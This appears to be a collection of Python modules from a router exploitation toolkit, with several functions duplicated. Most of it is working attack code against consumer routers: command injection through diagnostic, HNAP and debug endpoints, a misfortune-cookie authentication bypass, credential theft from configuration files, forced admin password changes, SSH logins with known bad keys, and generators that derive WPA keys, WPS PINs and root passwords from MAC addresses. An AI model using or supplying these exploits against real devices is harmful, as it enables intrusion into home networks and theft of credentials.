def get_host_info(self, host_info, index): if host_info is not None: # If this host data is already complete, just display it if host_info['dataComplete']: print_warning('Data for this host has already been enumerated!') return try: # Get extended device and service information if host_info: print_info("Requesting device and service info for " + host_info['name'] + " (this could take a few seconds)...") if not host_info['dataComplete']: (xml_headers, xml_data) = self.get_xml(host_info['xml_file']) # print(xmlHeaders) # print(xmlData) if not xml_data: print_error('Failed to request host XML file:' + host_info['xml_file']) return if not self.get_host_information(xml_data, xml_headers, index): print_error("Failed to get device/service info for " + host_info['name']) return print_success('Host data enumeration complete!') # hp.updateCmdCompleter(hp.ENUM_HOSTS) return except KeyboardInterrupt: return
def do_run(self, e): url = "http://%s:%s/diagnostic.php" % (self.host, self.port) payload = {'act': 'ping', 'dst': '& %s&' % self.command} headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'Accept-Language: en-us,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8' } try: print_warning("Sending exploit") response = requests.post(url, headers=headers, data=payload, timeout=60) if "<report>OK</report>" in response.text: print_success("output not available this is blind injection") else: print_error( "could not find marker in response, exploit failed") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed")
def do_run(self, e): user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C107373883=/omg1337hax'} target = 'http://' + self.host + ":" + self.port + '/blabla' try: response = requests.get(target, headers=headers, timeout=60) if response.status_code != 404: print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code) print_red("Device is not running RomPager") else: if 'server' in response.headers: server = response.headers.get('server') if re.search('RomPager', server) is not None: print_green("Got RomPager! Server:%s" % server) if re.search('omg1337hax', response.text) is not None: print_success("device is vulnerable to misfortune cookie") else: print_failed("test didn't pass.") print_warning("Device MAY still be vulnerable") else: print_failed("RomPager not detected, device is running: %s " % server) else: print_failed("Not running RomPager") except requests.exceptions.Timeout: print_error("Timeout!") except requests.exceptions.ConnectionError: print_error("No route to host")
def do_run(self, e): url = "http://%s:%s/getcfg.php" % (self.host, self.port) payload = {'SERVICES': 'DEVICE.ACCOUNT'} headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'Accept-Language: en-us,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8' } try: print_warning("Sending exploit") response = requests.post(url, headers=headers, data=payload, timeout=60) if "<service>DEVICE.ACCOUNT</service>" in response.text: usernames = re.findall("<name>(.*)</name>", response.text) passwords = re.findall("<password>(.*)</password>", response.text) if "==OoXxGgYy==" in passwords: print_error("Exploit failed, router responded with default value ==OoXxGgYy==") else: print_success("") for i in range(len(usernames)): print("Username: "******"Password: "******"Exploit failed") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed")
def do_run(self, e): url = "http://%s:%s/debug.cgi" % (self.host, self.port) data = {"data1": "echo 741852", "command": "ui_debug"} try: response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60) result = re.findall( "<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text) if "741852" == result[0]: print_success("Target is vulnerable") data = {"data1": self.command, "command": "ui_debug"} response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60) result = re.findall( "<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text) print(result[0]) else: print_error("target is not vulnerable") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed") except TypeError: print_error("Something went wrong in answer parsing")
def auth_bypass(self): user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = { 'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C' + str(self.number) + '=' + 'B' * self.offset + '\x00' } target = 'http://' + self.host + ":" + self.port try: response = requests.get(target, headers=headers, timeout=60) if response is not None and response.status_code <= 302: print_success( "Exploit sent, please check http://%s:%s authentication should be disabled" % (self.host, self.port)) else: print_error("Exploit failed") except requests.exceptions.Timeout: print_error("Timeout!") except requests.exceptions.ConnectionError: print_error("No route to host")
def do_run(self, e): #httplib2.debuglevel = 1 user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C107373883=/omg1337hax'} target = 'http://' + self.host + ":" + self.port + '/blabla' h = httplib2.Http(timeout=60) h.follow_all_redirects = True try: response, content = h.request(target, 'GET', headers=headers) if response.status != 404: print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status) print_red("Device is not running RomPager") else: if 'server' in response.keys(): server = response.get('server') if re.search('RomPager', server) is not None: print_green("Got RomPager! Server:%s" % server) if re.search('omg1337hax', content.decode()) is not None: print_success("device is vulnerable to misfortune cookie") else: print_failed("test didn't pass.") print_warning("Device MAY still be vulnerable") else: print_failed("RomPager not detected, device is running: %s " % server) else: print_failed("Not running RomPager") except socket.timeout: # Is there a better way of handling timeout in httplib2? print_error("Timeout!")
def do_run(self, e): url = "http://%s:%s/command.php" % (self.host, self.port) payload = {'cmd': '%s; echo end' % self.command} headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'Accept-Language: en-us,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8' } try: print_yellow("Sending exploit") # Requests forces URI encoding and can't be turned off # so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending request = requests.Request('POST', url, headers=headers, data=payload) r = request.prepare() # print("Before modification:", r.body) r.body = urllib.parse.quote('cmd=%s; echo end' % self.command, safe='/=') r.headers.update({'Content-Length': len(r.body)}) # print("After modification:", r.body) s = requests.Session() response = s.send(r, timeout=15) s.close() # This won't work # response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60) if "end" in response.text: # end8758 is unique tag to search for in output print_success("output of %s:" % self.command) print_green(response.text) else: print_error("could not find marker in response, exploit failed") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed or you killed httpd")
def do_run(self, e): print_info("Testing known keys") client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) connection = core.loader.open_database("./databases/bad_keys.db") cursor = connection.cursor() cursor.execute("SELECT user, port, filename, type, private_key FROM keys;") entries = cursor.fetchall() for entry in entries: try: username = entry[0] port = entry[1] filename = entry[2] key_type = entry[3] string_key = entry[4] if key_type == 'RSA': private_key = paramiko.RSAKey.from_private_key(io.StringIO(string_key)) elif key_type == 'DSA': private_key = paramiko.DSSKey.from_private_key(io.StringIO(string_key)) else: print_error("Failed to load key of type:", key_type) continue client.connect(self.host, port=port, username=username, pkey=private_key, look_for_keys=False, timeout=10) core.io.writetextfile(string_key, filename+".key") print_success("Username:"******"port:", port) print_info("Private key writen to:", filename+".key") client.close() except paramiko.AuthenticationException: pass except: pass
def do_run(self, e): url = "http://%s:%s/login_handler.php" % (self.host, self.port) headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'Accept-Language: en-us,en;q=0.5', 'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8' } data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; echo "741852' try: response = requests.post(url=url, headers=headers, data=data, timeout=60) if "741852" in response.text: print_success("target is vulnerable") # Not so sure about quoting of commands that has arguments data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; %s' % self.command response = requests.post(url=url, headers=headers, data=data, timeout=60) print(response.text) elif "failure" in response.text: print_error("Exploit failed, target is probably patched") print(response.text) except requests.Timeout: print_error("exploit failed") except requests.ConnectionError: print_error("exploit failed")
def do_run(self, e): url = "http://%s:%s/HNAP1" % (self.host, self.port) headers = { "SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % self.command } try: print_warning("Sending exploit") requests.post(url, headers=headers, timeout=60) print_warning( "HTTPd is still responding this is OK if you changed the payload" ) except requests.ConnectionError: print_success("exploit sent.") answer = query_yes_no( "Do you wish to dump all system settings? (if telned was started)" ) if answer is True: tn = telnetlib.Telnet(self.host, self.port) print_info("Sending command through telnet") tn.read_until(b'#', timeout=15) tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n") response = tn.read_until(b'#', timeout=15) tn.close() print_info("Writing response to config.xml") writetextfile(response.decode('ascii'), "config.xml") print_warning( "Don't forget to restart httpd or reboot the device") except requests.Timeout: print_error("timeout")
def do_run(self, e): mac_str = re.sub(r'[^a-fA-F0-9]', '', self.mac) bytemac = bytearray.fromhex(mac_str) print_success("") print_green('based on rg_mac:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5])) print_green('WPA key: %s\n' % (self.gen_key(bytemac))) bytemac[5] -= 5 print_green('based on BSSID:\nSSID: PBS-%02X%02X%02X' % (bytemac[3], bytemac[4], bytemac[5])) print_green('WPA key: %s\n' % (self.gen_key(bytemac)))
def do_run(self, e): f = open(self.input_file, 'rb') data = f.read() f.close() result = self.decompress_firmware(data) if result is not None: dirpath = core.io.writefile(result, "fw.decomp") print_success("Decompressed firmware written to fw.decomp") self.decompress_fs_only(data, dirpath) print_success("FS decompressed")
def do_run(self, e): f = open(self.input_file, 'rb') data = f.read() f.close() g, outdata = self.de_cfg(data) if g != self.CFG_RAW: core.io.writefile(outdata, "config.out") print_success("config file written to config.out, extracting credentials...") creds = self.get_credentials(outdata) print_green("Login :\t" + (creds[0] == b"" and b"admin" or creds[0]).decode()) print_green("Password :\t" + (creds[1] == b"" and b"admin" or creds[1]).decode())
def decrypt_cfg(self, data): """Decrypt config, bruteforce if default key fails""" modelstr = "V" + format(unpack(">H", self.get_modelid(data))[0], "04X") print_info('Model is :\t' + modelstr) ckey = self.make_key(modelstr) rdata = self.decrypt(data[0x100:], ckey) # if the decrypted data does not look good, bruteforce if self.smart_guess(rdata) != self.CFG_LZO: rdata = self.brute_cfg(data[0x100:]) print_success('Used key :\t[0x%02X]' % ckey) return data[:0x2D] + b'\x01' + data[0x2E:0x100] + rdata
def brute_cfg(self, data): """Check all possible keys until data looks like decrypted""" rdata = None key = 0 for i in range(256): rdata = self.decrypt(data, i) if self.smart_guess(rdata) == self.CFG_LZO: key = i break print_success('Found key:\t[0x%02X]' % key) return rdata
def do_run(self, e): url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % ( self.host, self.port) try: print_yellow("Sending exploit") response = requests.get(url, timeout=60) if response.status_code == 200 and 'name="admin_password1"' in response.text: print_success("target seems vulnerable") print_green( "You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL" ) print_yellow("Changing admin password") headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'Accept-Language: en-us,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8' } payload = { 'NO_NEED_AUTH': 1, 'AUTH_GROUP': 0, 'ACTION_POST': 1, 'apply': 'Save+Settings', 'admin_name': 'admin', 'admin_password1': '%s' % self.password, 'admin_password2': '%s' % self.password, 'grap_auth_enable_h': 0, 'rt_ipaddr': '0.0.0.0' } url = "http://%s:%s/tools_admin.php" % (self.host, self.port) response = requests.post(url=url, headers=headers, data=payload, timeout=60) if response.status_code == 200: print_success( "password seems to be changed try to login with: %s" % self.password) else: print_error("password change failed") else: print_error("exploit failed") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed")
def do_run(self, e): mac = self.mac mac = mac.upper() mac = mac.replace("-", "") mac = mac.replace(":", "") fibnum = [0, 0, 0, 0, 0, 0] fibsum = 0 seed = 16 count = 1 offset = 0 counter = 0 a = 0 macs = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] tmp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] c = 0 while c < 12: macs[a] = int(mac[c]+mac[c+1], 16) tmp[a] = int(mac[c] + mac[c+1], 16) a += 1 c += 2 for i in range(6): if tmp[i] > 30: while tmp[i] > 31: tmp[i] -= 16 counter += 1 if counter == 0: if tmp[i] < 3: tmp[i] = tmp[0]+tmp[1]+tmp[2]+tmp[3]+tmp[4]+tmp[5]-tmp[i] if tmp[i] > 0xff: tmp[i] = tmp[i] and 0xff tmp[i] = int(tmp[i] % 28) + 3 fibnum[i] = self.fib_gen(tmp[i]) else: fibnum[i] = self.fib_gen(tmp[i]) + self.fib_gen(counter) counter = 0 for i in range(6): fibsum += (fibnum[i] * self.fib_gen(i+seed))+macs[i] fibsum %= 10000000 checksum = self.compute_checksum(fibsum) fibsum = (fibsum * 10) + checksum print_success("") print_green("WPS PIN: " + str(fibsum))
def do_run(self, e): mac = self.mac mac = mac.upper() mac = mac.replace("-", "") mac = mac.replace(":", "") ssid = "Sitecom%s" % mac[6:].upper() wpa_4000 = self.generate_key(mac, "4000") wpa_4004 = self.generate_key(mac, "4004") print_success("WPA keys generated") print("SSID:" + ssid) print("WPA Key for model WLR-4000: " + wpa_4000) print("WPA Key for model WLR-4004: " + wpa_4004)
def do_run(self, e): f = open(self.input_file, 'rb') data = f.read() f.close() g, outdata = self.de_cfg(data) if g != self.CFG_RAW: core.io.writefile(outdata, "config.out") print_success( "config file written to config.out, extracting credentials...") creds = self.get_credentials(outdata) print_green("Login :\t" + (creds[0] == b"" and b"admin" or creds[0]).decode()) print_green("Password :\t" + (creds[1] == b"" and b"admin" or creds[1]).decode())
def do_run(self, e): url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port) try: print_yellow("Sending exploit") response = requests.get(url, timeout=60) if response.status_code == 200 and "<center>" in response.text: print_success("credentials fetched") credentials = re.findall("<center>\n\t\t\t(.*)", response.text) print(credentials[0]) except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed")
def do_run(self, e): url = "http://%s:%s/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" % (self.host, self.port) try: print_yellow("Sending exploit") response = requests.get(url, timeout=60) if response.status_code == 200 and "<center>" in response.text: print_success("credentials fetched") credentials = re.findall("<center>\n\t\t\t(.*)", response.text) print_green(credentials[0]) except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed")
def do_run(self, e): mac = self.mac mac = mac.upper() mac = mac.replace("-", "") mac = mac.replace(":", "") const = int('D0EC31', 16) inp = int(mac[6:], 16) result = (inp - const)//4 ssid = "Discus--"+mac[6:] key = "YW0" + str(result) print_success("") print_green("Possible SSID: " + ssid) print_green("WPA Key: " + key)
def do_run(self, e): target = "http://" + self.host + ":" + self.port try: response = requests.get(target, timeout=60) if response.status_code == requests.codes.unauthorized: print_yellow("Password protection detected") for i in range(0, 3): time.sleep(1) requests.get(target+"/BRS_netgear_success.html", timeout=60) response = requests.get(target, timeout=60) if response.status_code == requests.codes.ok: print_success("bypass successful. Now use your browser to have at look at the admin interface.") except requests.RequestException: print_error("timeout!")
def do_update(self, e): args = e.split(' ') if args[0] == "oui": print_info("Updating OUI DB. Database rebuild may take several minutes.") # print_blue("Do you wish to continue? (y/n)") # Add if here updater.update_oui() print_success("OUI database updated successfully.") elif args[0] == "force": print_info("Discarding local changes and updating REXT") updater.update_rext_force() elif args[0] == "": print_info("Updating REXT please wait...") updater.update_rext() print_success("Update successful")
def do_run(self, e): mac = self.mac mac = mac.replace(":", "") mac = mac.replace("-", "") c1 = str(int(mac[8:], 16)) while len(c1) < 5: c1 = "0" + c1 s6 = int(c1[0], 16) s7 = int(c1[1], 16) s8 = int(c1[2], 16) s9 = int(c1[3], 16) s10 = int(c1[4], 16) m7 = int(mac[6], 16) m8 = int(mac[7], 16) m9 = int(mac[8], 16) m10 = int(mac[9], 16) m11 = int(mac[10], 16) m12 = int(mac[11], 16) k1 = (s7 + s8 + m11 + m12) & 0x0F k2 = (m9 + m10 + s9 + s10) & 0x0F x1 = k1 ^ s10 x2 = k1 ^ s9 x3 = k1 ^ s8 y1 = k2 ^ m10 y2 = k2 ^ m11 y3 = k2 ^ m12 z1 = m11 ^ s10 z2 = m12 ^ s9 z3 = k1 ^ k2 ssid = "EasyBox-" + format(m7, 'x') + format(m8, 'x') + format(m9, 'x') \ + format(m10, 'x') + format(s6, 'x') + format(s10, 'x') wpakey = format(x1, 'x') + format(y1, 'x') + format(z1, 'x') + \ format(x2, 'x') + format(y2, 'x') + format(z2, 'x') + \ format(x3, 'x') + format(y3, 'x') + format(z3, 'x') print_success("WPA2 key generated") print("SSID:" + ssid) print("WPA2KEY:" + wpakey.upper())
def do_run(self, e): target = "http://" + self.host + ":" + self.port try: response = requests.get(target + "/rom-0", timeout=60) content_type = 'application/octet-stream' if response.status_code == requests.codes.ok and response.headers.get('Content-Type') == content_type: print_success("got rom-0 file, size:" + str(len(response.content))) core.io.writefile(response.content, "rom-0") else: print_error("failed") print_info("Checking if rpFWUpload.html is available") response = requests.get(target + "/rpFWUpload.html", timeout=60) if response.status_code == requests.codes.ok: print_success("rpFWUpload.html is accessible") else: print_failed("rpFWUpload.html is not accessible") except requests.RequestException: print_error("timeout!")
def do_run(self, e): url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port) try: print_warning("Sending exploit") # It took me longer than necessary to find out how to use Content-Disposition properly # Always set stream=True otherwise you may not get the whole file response = requests.post(url, files={'config': ''}, timeout=60, stream=True) if response.status_code == 200: if response.headers.get('Content-Disposition'): print_success("got file in response") print_info("Writing file to config.bin") core.io.writefile(response.content, "config.bin") print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML") except requests.ConnectionError as e: print_error("connection error %s" % e) except requests.Timeout: print_error("timeout")
def do_run(self, e): target = "http://" + self.host + ":" + self.port try: response = requests.get(target, timeout=60) if response.status_code == requests.codes.unauthorized: print_yellow("Password protection detected") for i in range(0, 3): time.sleep(1) requests.get(target + "/BRS_netgear_success.html", timeout=60) response = requests.get(target, timeout=60) if response.status_code == requests.codes.ok: print_success( "bypass successful. Now use your browser to have at look at the admin interface." ) except requests.RequestException: print_error("timeout!")
def do_run(self, e): f = open(self.input_file, 'rb') # These should be offsets of spt.dat but it somehow works with these values usually, # the core.compression.lzs is not a very good implementation, it won't decompress the whole file correctly # but it's enough to to extract admin password fpos = 8568 fend = 8788 f.seek(fpos) amount = 221 while fpos < fend: if fend - fpos < amount: amount = amount data = f.read(amount) fpos += len(data) result, window = core.compression.lzs.LZSDecompress(data) print_info("Printing strings found in decompressed data (admin password is usually the first found):") for s in interface.utils.strings(result): print_success(s)
def do_run(self, e): url = "http://%s:%s/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch" % (self.host, self.port) try: print_yellow("Sending exploit") # It took me longer than necessary to find out how to use Content-Disposition properly # Always set stream=True otherwise you may not get the whole file response = requests.post(url, files={'config': ''}, timeout=60, stream=True) if response.status_code == 200: if response.headers.get('Content-Disposition'): print_success("got file in response") print_yellow("Writing file to config.bin") core.io.writefile(response.content, "config.bin") print_success("you can now use decryptors/zte/config_zlib_decompress to extract XML") except requests.ConnectionError as e: print_error("connection error %s" % e) except requests.Timeout: print_error("timeout")
def do_run(self, e): target = "http://%s:%s/%s" % (self.host, self.port, self.file) try: # We have to manually craft the request if you use requests.get it sents HEAD first # and the exploit won't work request = requests.Request('GET', target) r = request.prepare() s = requests.Session() response = s.send(r, timeout=30) s.close() if response.status_code == 200: print_success("writing to file%s" % self.file) core.io.writetextfile(response.text, self.file) else: print_error("exploit probably failed got response code %s" % response.status_code) except requests.RequestException: print_error("timeout!")
def do_run(self, e): url = "http://%s:%s/hidden_info.html" % (self.host, self.port) try: print_warning("Sending exploit") response = requests.get(url, timeout=60) if "Manufacture Information" in response.text: print_success("information obtained, writing response into hidden_info.html") core.io.writetextfile(response.text, "hidden_info.html") print_warning("Please check file, response seems to depend on FW version, parsing may not be accurate") value = re.findall("str =\(\"\[\{(.*)\}", response.text) value = value[0].split(',') for i in value: print_green(i) else: print_error("exploit failed") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed")
def do_run(self, e): mac = self.mac mac = mac.upper() mac = mac.replace("-", "") mac = mac.replace(":", "") mac = mac[6:] p = int(mac, 16) % 10000000 pin = p accum = 0 while pin: accum += int(3 * (pin % 10)) pin = int(pin / 10) accum += int(pin % 10) pin = int(pin / 10) key = (10 - accum % 10) % 10 key = format("%07d%d" % (p, key)) print_success("") print_green("WPS pin:" + key)
def do_run(self, e): target = "http://" + self.host + ":" + self.port try: response = requests.get(target + "/rom-0", timeout=60) content_type = 'application/octet-stream' if response.status_code == requests.codes.ok and response.headers.get( 'Content-Type') == content_type: print_success("got rom-0 file, size:" + str(len(response.content))) core.io.writefile(response.content, "rom-0") else: print_error("failed") print("Checking if rpFWUpload.html is available") response = requests.get(target + "/rpFWUpload.html", timeout=60) if response.status_code == requests.codes.ok: print_success("rpFWUpload.html is accessible") else: print_failed("rpFWUpload.html is not accessible") except requests.RequestException: print_error("timeout!")
def do_run(self, e): url = "http://%s:%s/diagnostic.php" % (self.host, self.port) payload = {'act': 'ping', 'dst': '& %s&' % self.command} headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'Accept-Language: en-us,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8' } try: print_warning("Sending exploit") response = requests.post(url, headers=headers, data=payload, timeout=60) if "<report>OK</report>" in response.text: print_success("output not available this is blind injection") else: print_error("could not find marker in response, exploit failed") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed")
def do_run(self, e): mac = self.mac mac = mac.upper() mac = mac.replace("-", "") mac = mac.replace(":", "") password = [c for c in "00000000"] mac = [c.lower() for c in mac] password[0] = self.mash(mac[5], mac[11]) password[1] = self.mash(mac[0], mac[2]) password[2] = self.mash(mac[10], mac[11]) password[3] = self.mash(mac[0], mac[9]) password[4] = self.mash(mac[10], mac[6]) password[5] = self.mash(mac[3], mac[9]) password[6] = self.mash(mac[1], mac[6]) password[7] = self.mash(mac[3], mac[4]) password = "".join(p for p in password) print_success("") print_green("Telnet password for root is: " + password)
def do_run(self, e): mac_array = self.mac.split(":") counter = 0 for i in mac_array: mac_array[counter] = int(i, 16) counter += 1 counter = 0 while counter < 5: char = mac_array[counter] + mac_array[counter + 1] self.printchar(char) counter += 1 counter = 0 while counter < 3: char = mac_array[counter] + mac_array[counter + 1] + 0xF self.printchar(char) counter += 1 print_success('credentials generated') print("Username: __super") print("Password: " + self.password)
def do_run(self, e): mac_array = self.mac.split(":") counter = 0 for i in mac_array: mac_array[counter] = int(i, 16) counter += 1 counter = 0 while counter < 5: char = mac_array[counter] + mac_array[counter+1] self.printchar(char) counter += 1 counter = 0 while counter < 3: char = mac_array[counter] + mac_array[counter+1] + 0xF self.printchar(char) counter += 1 print_success('') print_green("Username: __super") print_green("Password: " + self.password)
def do_run(self, e): url = "http://%s:%s/debug.cgi" % (self.host, self.port) data = {"data1": "echo 741852", "command": "ui_debug"} try: response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60) result = re.findall("<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text) if "741852" == result[0]: print_success("Target is vulnerable") data = {"data1": self.command, "command": "ui_debug"} response = requests.post(url=url, data=data, auth=("Gemtek", "gemtekswd"), timeout=60) result = re.findall("<textarea rows=30 cols=100>\\n(.*)\\n</textarea>", response.text) print(result[0]) else: print_error("target is not vulnerable") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed") except TypeError: print_error("Something went wrong in answer parsing")
def do_run(self, e): file = "" for file in self.files: print_info("Testing file: " + file) url = "http://%s:%s/%s?writeData=true®info=0&macAddress= 001122334455 -c 0 ;" \ "%s; echo #" % (self.host, self.port, file, "sleep 10") try: print_info("Doing timebased check with sleep 10") time_start = datetime.datetime.now() response = requests.get(url=url, timeout=60) time_end = datetime.datetime.now() delta = time_end - time_start if response.status_code == 200 and "Update Success!" in response.text: if 13 > delta.seconds > 9: print_success("Timebased check OK target should be vulnerable") else: print_warning("Timebased check failed, but target still might be vulnerable") break except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed") print_success("Vulnerable file:" + file) print_info("Sending command") url = "http://%s:%s/%s?writeData=true®info=0&macAddress= 001122334455 -c 0 ;" \ "%s; echo #" % (self.host, self.port, file, self.command) try: response = requests.get(url=url, timeout=60) if response.status_code == 200 and "Update Success!" in response.text: print_success("command sent") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("target stopped responding or you issued reboot or killed lighttpd")
def do_run(self, e): url = "http://%s:%s/command.php" % (self.host, self.port) payload = {'cmd': '%s; echo end' % self.command} headers = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'Accept-Language: en-us,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8' } try: print_yellow("Sending exploit") # Requests forces URI encoding and can't be turned off # so we have to prepare HTTP request manually and modify it with urllib.parse.quote before sending request = requests.Request('POST', url, headers=headers, data=payload) r = request.prepare() # print("Before modification:", r.body) r.body = urllib.parse.quote('cmd=%s; echo end' % self.command, safe='/=') r.headers.update({'Content-Length': len(r.body)}) # print("After modification:", r.body) s = requests.Session() response = s.send(r, timeout=15) s.close() # This won't work # response = requests.post(url, headers=headers, data=payload, proxies=proxies, timeout=60) if "end" in response.text: # end8758 is unique tag to search for in output print_success("output of %s:" % self.command) print_green(response.text) else: print_error( "could not find marker in response, exploit failed") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed or you killed httpd")
def do_run(self, e): print_info("Testing known keys") client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) connection = core.loader.open_database("./databases/bad_keys.db") cursor = connection.cursor() cursor.execute( "SELECT user, port, filename, type, private_key FROM keys;") entries = cursor.fetchall() for entry in entries: try: username = entry[0] port = entry[1] filename = entry[2] key_type = entry[3] string_key = entry[4] if key_type == 'RSA': private_key = paramiko.RSAKey.from_private_key( io.StringIO(string_key)) elif key_type == 'DSA': private_key = paramiko.DSSKey.from_private_key( io.StringIO(string_key)) else: print_error("Failed to load key of type:", key_type) continue client.connect(self.host, port=port, username=username, pkey=private_key, look_for_keys=False, timeout=10) core.io.writetextfile(string_key, filename + ".key") print_success("Username:"******"port:", port) print_info("Private key writen to:", filename + ".key") client.close() except paramiko.AuthenticationException: pass except: pass
def do_run(self, e): url = "http://%s:%s/HNAP1" % (self.host, self.port) headers = {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % self.command} try: print_yellow("Sending exploit") requests.post(url, headers=headers, timeout=60) print_yellow("HTTPd is still responding this is OK if you changed the payload") except requests.ConnectionError: print_success("exploit sent.") answer = query_yes_no("Do you wish to dump all system settings? (if telned was started)") if answer is True: tn = telnetlib.Telnet(self.host, self.port) print_yellow("Sending command through telnet") tn.read_until(b'#', timeout=15) tn.write(b"xmldbc -d /var/config.xml; cat /var/config.xml\n") response = tn.read_until(b'#', timeout=15) tn.close() print_yellow("Writing response to config.xml") writetextfile(response.decode('ascii'), "config.xml") print_yellow("Don't forget to restart httpd or reboot the device") except requests.Timeout: print_error("timeout")
def do_run(self, e): url = "http://%s:%s/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0" % (self.host, self.port) try: print_warning("Sending exploit") response = requests.get(url, timeout=60) if response.status_code == 200 and 'name="admin_password1"' in response.text: print_success("target seems vulnerable") print_success("You can visit any page by adding ?NO_NEED_AUTH=1&AUTH_GROUP=0 to URL") print_info("Changing admin password") headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'Accept-Language: en-us,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8' } payload = {'NO_NEED_AUTH': 1, 'AUTH_GROUP': 0, 'ACTION_POST': 1, 'apply': 'Save+Settings', 'admin_name': 'admin', 'admin_password1': '%s' % self.password, 'admin_password2': '%s' % self.password, 'grap_auth_enable_h': 0, 'rt_ipaddr': '0.0.0.0'} url = "http://%s:%s/tools_admin.php" % (self.host, self.port) response = requests.post(url=url, headers=headers, data=payload, timeout=60) if response.status_code == 200: print_success("password seems to be changed try to login with: %s" % self.password) else: print_error("password change failed") else: print_error("exploit failed") except requests.Timeout: print_error("timeout") except requests.ConnectionError: print_error("exploit failed")